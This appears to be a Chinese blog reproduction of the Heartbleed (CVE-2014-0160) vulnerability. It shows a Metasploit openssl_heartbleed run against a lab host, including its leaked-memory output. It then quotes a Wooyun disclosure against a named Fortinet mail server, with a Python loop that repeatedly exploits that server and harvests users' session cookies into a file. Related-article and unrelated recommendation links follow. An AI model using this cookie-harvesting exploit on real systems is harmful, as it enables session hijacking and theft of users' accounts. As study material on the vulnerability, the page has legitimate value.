漏洞分析的两篇文章

https://blog.csdn.net/javajiawei/article/details/82429886

https://xz.aliyun.com/t/1771

set verbose true 才能看到

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134

rhosts => 172.16.20.134

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 172.16.20.134:443     - Sending Client Hello...

[*] 172.16.20.134:443     - SSL record #1:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  86

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 82

[*] 172.16.20.134:443     -             Type:   Server Hello (2)

[*] 172.16.20.134:443     -             Server Hello Version:           0x0301

[*] 172.16.20.134:443     -             Server Hello random data:       5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b

[*] 172.16.20.134:443     -             Server Hello Session ID length: 32

[*] 172.16.20.134:443     -             Server Hello Session ID:        cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af

[*] 172.16.20.134:443     - SSL record #2:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  909

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 905

[*] 172.16.20.134:443     -             Type:   Certificate Data (11)

[*] 172.16.20.134:443     -             Certificates length: 902

[*] 172.16.20.134:443     -             Data length: 905

[*] 172.16.20.134:443     -             Certificate #1:

[*] 172.16.20.134:443     -                     Certificate #1: Length: 899

[*] 172.16.20.134:443     -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>

[*] 172.16.20.134:443     - SSL record #3:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  331

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 327

[*] 172.16.20.134:443     -             Type:   Server Key Exchange (12)

[*] 172.16.20.134:443     - SSL record #4:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  4

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 0

[*] 172.16.20.134:443     -             Type:   Server Hello Done (14)

[*] 172.16.20.134:443     - Sending Heartbeat...

[*] 172.16.20.134:443     - Heartbeat response, 65535 bytes

[+] 172.16.20.134:443     - Heartbeat response with leak

[*] 172.16.20.134:443     - Printable info leaked:

......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS..\.....J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.\;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS..\.....J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

乌云案例

详细说明:

code 区域

Fortinet邮箱服务器url:https://mail.fortinet.com.cn

存在漏洞的端口:443

该端口存在CVE-2014-0160即心脏滴血漏洞,每次可以读取服务器内存64 KB数据

首先是神器openssl.py测试信息:

code 区域

可以看到账户cookie,可以通过如下脚本,不断的抓cookie:

code 区域

import os

import re

import time

accounts = []

while True:

    result = os.popen('openssl.py mail.fortinet.com.cn').read()

    matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)

    for match in matches:

        if match not in accounts:

            accounts.append(match)

            with open('accounts.txt', 'a') as inFile:

                inFile.write(str(match) + '\n')

            print 'New Account:', match

    time.sleep(1.0)

抓了一小会就有三个:

漏洞证明:

修复方案:

补丁

HEARTBLEED 漏洞复现的更多相关文章

  1. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  2. heartbleed漏洞利用

    1.  heartbleed漏洞扫描: 2.  heartbleed漏洞利用: poc.py      117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...

  3. ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

    没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit. ...

  4. 【S2-052】漏洞复现(CVE-2017-9805)

    一.漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行. 二.受影响版本 Struts2 ...

  5. markdown反射型xss漏洞复现

    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...

  6. WebLogic XMLDecoder反序列化漏洞复现

    WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://g ...

  7. Struts2-052 漏洞复现

    s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描 ...

  8. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  9. Tomcat/7.0.81 远程代码执行漏洞复现

    Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...

随机推荐

  1. Jenkins+Ansible+Gitlab自动发布/回滚Spring项目

    一.实现方法流程图 流程图如下:代码托管在本地GitLab上(为了复现整套流水线,我直接使用了GitHub,懒得再搭建GitLab),开发完成后提交代码到代码仓库,[自动]触发Jenkins进行持续集 ...

  2. Linux下3种常用的网络测速工具

    大家好,我是良许. 不管你用的是什么操作系统,网速都是你非常关心的一个性能指标,毕竟,谁都不想看个视频结果网速卡到你怀疑人生.本文介绍三个 Linux 命令行下的网络测速工具,让你随时随地知道你的网络 ...

  3. 一步步打造QQ群发消息群发器

    最近为了做公众号号推广,吸粉,然后加了几百个QQ群,感觉QQ群的群发效果还是不错的,一天能捞到100个粉丝左右,好的时候也有200个,少的时候几十个,但是由于太多的群了,手工一个个点击开来群发,几百个 ...

  4. 【Scala】scala的继承能干嘛?这段简单的代码或许能帮你梳理

    package cn.itcast.scala.demo2 class Person { //private关键字和final关键字修饰的常量无法被继承重写 val id: Int = 1 var n ...

  5. Battery Charging Specification Revision 1.2 中文版本

    Battery Charging Specification Revision 1.2 Li,Guanglei 2014.04.03 Rev0.1 转载请注明转自:http://blog.csdn.n ...

  6. CF-448C Painting Fence 分治

    Painting fence 题意 乍一看以为是之前做过的一道单调队列优化的DP,不是. 也是有n块木板,每个木板宽1米,有一个高度ai,现在要把他们刷成橘色,给了你一个宽一米的刷子,你可以横着刷,或 ...

  7. Quartus II 与modelsim连接不上的问题

    在Quartus II 中tools>options>General>EDA Tool Options 设置modelsim 路径 说明:不管是Quartus II 与modelsi ...

  8. python语法学习第六天--字典

    字典:可变容器类型,用键值对的形式采用花括号储存(键唯一) 语法:d={key1:value1,key2:value2} 访问字典中的值: 字典名[键名]#若字典中不存在则报错 更改字典: 添加值:字 ...

  9. HDU 2014 (水)

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=2014 题目大意:给你 n 个数,去掉 max 和 min ,求平均数 解题思路: 很水,边记录分数,边 ...

  10. mybatis 插入数据返回ID

    hibernate中插入数据后会返回插入的数据的ID,mybatis要使用此功能需要在配置文件中显示声明两个属性即可: